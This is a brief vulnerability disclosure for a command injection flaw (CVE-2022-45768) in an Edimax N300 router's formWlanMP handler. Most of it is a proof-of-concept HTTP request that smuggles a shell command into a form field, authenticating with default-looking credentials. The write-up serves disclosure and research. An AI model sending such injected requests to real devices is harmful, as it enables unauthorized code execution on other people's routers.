Headline
CVE-2022-45768: CVE/Edimax.md at main · Erebua/CVE
Command Injection vulnerability in Edimax Technology Co., Ltd. Wireless Router N300 Firmware BR428nS v3 allows attacker to execute arbitrary code via the formWlanMP function.
Firmware Version: BR6428NSv3_1.20 You can download Firmware at this website and use FirmAE to simulate the router environment.
There is a command injection in formWlanMP Function of binary file webs. After obtaining the POST parameter, it is directly incorporated into the system function for execution without checking and filtering
PS You must pass basic verification before you can exploit this vulnerability can find the user/passwd in website
POST /goform/formWlanMP HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://192.168.2.1
Authorization: Basic YWRtaW46MTIzNA==
Connection: close
Referer: http://192.168.2.1/status.asp
Cookie: language=14
Upgrade-Insecure-Requests: 1
ateFunc=1;touch%20/tmp/Swe3ty&submit-url=%2Findex.asp